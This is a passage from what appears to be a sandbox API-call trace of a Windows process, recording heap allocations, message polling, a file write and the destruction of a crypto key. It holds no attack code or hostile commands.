wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.910] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.910] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0229.910] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.910] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.910] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0229.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.911] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0229.911] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0229.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.913] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.913] WriteFile (in: hFile=0x2a0, lpBuffer=0x3bf0dd8*, nNumberOfBytesToWrite=0x2480, lpNumberOfBytesWritten=0x8cf5e4, lpOverlapped=0x0 | out: lpBuffer=0x3bf0dd8*, lpNumberOfBytesWritten=0x8cf5e4*=0x2480, lpOverlapped=0x0) returned 1 [0229.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.915] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0229.915] CharUpperBuffW (in: lpsz="_CRYPT_DESTROYKEY", cchLength=0x11 | out: lpsz="_CRYPT_DESTROYKEY") returned 0x11 [0229.915] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.915] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0229.915] PeekMessageW (in: lpMsg=0x8cedb0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cedb0) returned 0 [0229.915] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0229.915] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0229.916] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e51070, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0229.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0229.916] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0229.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51028 | out: hHeap=0x970000) returned 1 [0229.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510b8 [0229.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.916] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0229.916] CryptDestroyKey (hKey=0xa86f90) returned 1 [0229.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e56588 [0229.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0229.916] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55078 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51010 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511c0 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51010 | out: hHeap=0x970000) returned 1 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0229.917] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510e8 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.917] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51058 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51178 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51190 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f440 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.918] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e56588 | out: hHeap=0x970000) returned 1 [0229.918] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55028 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0229.918] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50da0 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51220 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0229.919] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7b0 [0229.919] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.919] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0229.919] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f7b0 | out: hHeap=0x970000) returned 1 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50d40 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0229.920] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04230 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0229.920] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04230 | out: hHeap=0x970000) returned 1 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.920] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.920] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.920] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51088 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50ff8 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fe0 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510b8 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f490 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e60 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511f0 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51130 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.921] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55058 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55058 | out: hHeap=0x970000) returned 1 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51040 | out: hHeap=0x970000) returned 1 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51088 | out: hHeap=0x970000) returned 1 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ff8 | out: hHeap=0x970000) returned 1 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50fe0 | out: hHeap=0x970000) returned 1 [0229.921] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510b8 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511f0 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51130 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f490 | out: hHeap=0x970000) returned 1 [0229.922] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.922] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f042a0 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0229.922] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f042a0 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50e00 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0229.922] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0229.922] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0229.922] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69bc8 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69bc8 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0229.923] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0229.923] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.923] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ff8 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0229.923] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550e8 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550e8 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a68 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0229.923] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ff8 | out: hHeap=0x970000) returned 1 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0229.924] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d40 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55008 | out: hHeap=0x970000) returned 1 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fc8 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fc8 | out: hHeap=0x970000) returned 1 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e512b0 [0229.924] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f38 | out: hHeap=0x970000) returned 1 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e00 | out: hHeap=0x970000) returned 1 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e512b0 | out: hHeap=0x970000) returned 1 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d40 | out: hHeap=0x970000) returned 1 [0229.924] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77b48 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510a0 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50da0 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f670 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f418 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f760 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51100 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51118 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55078 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e30 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e18 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f6e8 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ec0 | out: hHeap=0x970000) returned 1 [0229.925] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d88 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50de8 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f38 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d58 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50d10 | out: hHeap=0x970000) returned 1 [0229.926] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f08 | out: hHeap=0x970000) returned 1 